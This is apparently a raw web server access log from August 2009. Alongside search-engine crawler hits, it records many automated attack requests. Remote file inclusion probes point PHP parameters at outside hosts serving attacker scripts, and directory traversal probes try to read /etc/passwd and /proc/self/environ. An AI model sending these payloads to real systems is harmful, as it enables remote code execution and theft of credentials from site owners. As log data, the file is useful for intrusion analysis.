218.38.136.251 - - [16/Aug/2009:04:58:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:04:58:41 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.55.107.181 - - [16/Aug/2009:04:58:46 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.27.203.107 - - [16/Aug/2009:04:59:43 -0500] "GET /logs/access_log.1238889600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:04:59:43 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:04:59:43 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:05:00:37 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:05:00:37 -0500] "GET /logs/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:05:00:37 -0500] "GET /errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:05:00:37 -0500] "GET /logs/access_log.1235692800/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.234 - - [16/Aug/2009:05:00:47 -0500] "GET /logs/access_log.1204761600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.131 - - [16/Aug/2009:05:01:17 -0500] "GET /logs/access_log.1247011200 HTTP/1.0" 200 734695 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.158.22.128 - - [16/Aug/2009:05:02:44 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:05:02:44 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:05:02:45 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
65.55.208.137 - - [16/Aug/2009:05:03:20 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [16/Aug/2009:05:03:20 -0500] "GET /logs/access_log.1242000000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.27.203.107 - - [16/Aug/2009:05:03:45 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:03:45 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:03:45 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:03:56 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:05:06:01 -0500] "GET /logs/index2.php?p=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:05:06:01 -0500] "GET /index2.php?p=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:05:06:01 -0500] "GET /logs/access_log.1243641600/index2.php?p=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:05:06:02 -0500] "GET /logs/access_log.1238630400/index2.php?p=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:06 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:06 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:06 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:18 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:18 -0500] "GET /logs/access_log.1236211200//classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:18 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.13.191.186 - - [16/Aug/2009:05:06:18 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
190.4.27.238 - - [16/Aug/2009:05:07:05 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
190.4.27.238 - - [16/Aug/2009:05:07:05 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
190.4.27.238 - - [16/Aug/2009:05:07:05 -0500] "GET /modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:05:08:03 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:05:08:07 -0500] "GET /logs/access_log.1247788800//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:05:08:10 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:05:09:02 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:05:09:02 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:05:09:04 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:09:12 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:09:12 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:09:14 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
93.187.200.218 - - [16/Aug/2009:05:10:04 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
93.187.200.218 - - [16/Aug/2009:05:10:04 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
93.187.200.218 - - [16/Aug/2009:05:10:06 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
119.63.193.55 - - [16/Aug/2009:05:10:27 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
125.247.60.3 - - [16/Aug/2009:05:11:59 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:05:11:59 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:05:12:01 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:12:34 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:12:35 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:12:36 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
65.55.106.136 - - [16/Aug/2009:05:13:17 -0500] "GET /?M=D HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [16/Aug/2009:05:16:23 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:29 -0500] "GET //becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:33 -0500] "GET /logs/access_log.1241222400//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:33 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:17:35 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:17:35 -0500] "GET /logs/access_log.1241049600///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:05:17:38 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:53 -0500] "GET /logs/access_log.1241222400//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:53 -0500] "GET //becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:17:53 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:18:04 -0500] "GET /logs/access_log.1241222400//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:18:04 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:18:04 -0500] "GET //becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:05:19:05 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:05:19:05 -0500] "GET /logs/access_log.1236038400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:05:19:05 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:19:10 -0500] "GET /logs/access_log.1241222400//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:19:10 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:05:19:10 -0500] "GET //becommunity/community/index.php?pageurl=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
75.119.218.115 - - [16/Aug/2009:05:23:40 -0500] "GET /logs//index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:05:23:40 -0500] "GET //index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:05:23:42 -0500] "GET /logs//index.php?conteudo=http://www.autoremap.com//id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
75.119.218.115 - - [16/Aug/2009:05:23:42 -0500] "GET //index.php?conteudo=http://www.autoremap.com//id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.27.203.107 - - [16/Aug/2009:05:24:06 -0500] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.119.218.115 - - [16/Aug/2009:05:25:25 -0500] "GET /logs//index.php?meio=http://www.autoremap.com//id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
75.119.218.115 - - [16/Aug/2009:05:25:25 -0500] "GET //index.php?meio=http://www.autoremap.com//id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
75.119.218.115 - - [16/Aug/2009:05:25:51 -0500] "GET /logs//index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:05:25:51 -0500] "GET //index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
110.45.144.23 - - [16/Aug/2009:05:28:35 -0500] "GET /logs/access_log.1247788800////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:28:35 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:28:37 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:05:28:44 -0500] "GET /logs/access_log.1247875200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:05:29:27 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:05:29:29 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:05:29:30 -0500] "GET /logs/access_log.1247788800////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:05:29:34 -0500] "GET /logs/access_log.1247875200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.169.210.130 - - [16/Aug/2009:05:29:36 -0500] "GET /logs/editor/errors.php?error=http://www.radioficko.com/chat/chat/inc/swfimageproxy/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
217.169.210.130 - - [16/Aug/2009:05:29:36 -0500] "GET /editor/errors.php?error=http://www.radioficko.com/chat/chat/inc/swfimageproxy/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
212.114.13.126 - - [16/Aug/2009:05:30:45 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.114.13.126 - - [16/Aug/2009:05:30:45 -0500] "GET /logs/access_log.1243209600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.114.13.126 - - [16/Aug/2009:05:30:59 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.114.13.126 - - [16/Aug/2009:05:31:02 -0500] "GET /logs/access_log.1243641600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.114.13.126 - - [16/Aug/2009:05:31:04 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
212.114.13.126 - - [16/Aug/2009:05:31:04 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
212.114.13.126 - - [16/Aug/2009:05:31:05 -0500] "GET /logs/access_log.1243209600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
212.114.13.126 - - [16/Aug/2009:05:31:05 -0500] "GET /logs/access_log.1243641600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://post193.us/chid.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.174.114.20 - - [16/Aug/2009:05:32:50 -0500] "GET /logs/access_log.1242259200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:05:36:50 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:36:50 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:37:04 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:37:04 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
115.88.240.91 - - [16/Aug/2009:05:41:55 -0500] "GET //include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:41:55 -0500] "GET /logs//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:42:04 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:05:42:04 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:05:42:04 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:05:42:04 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:05:42:09 -0500] "GET /logs/access_log.1242950400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:05:42:14 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:05:42:51 -0500] "GET /logs//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:05:42:51 -0500] "GET //errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:05:42:52 -0500] "GET /logs/access_log.1230595200//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:05:42:58 -0500] "GET /home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:42:58 -0500] "GET /logs/home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:42:58 -0500] "GET /logs/access_log.1241049600/home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 318 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:43:02 -0500] "GET /home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:43:02 -0500] "GET /logs/access_log.1241049600/home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 318 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:05:43:02 -0500] "GET /logs/home.php?index=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
222.234.2.107 - - [16/Aug/2009:05:43:05 -0500] "GET //errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:05:43:05 -0500] "GET /logs//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:05:43:05 -0500] "GET /logs/access_log.1230595200//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:05:43:09 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
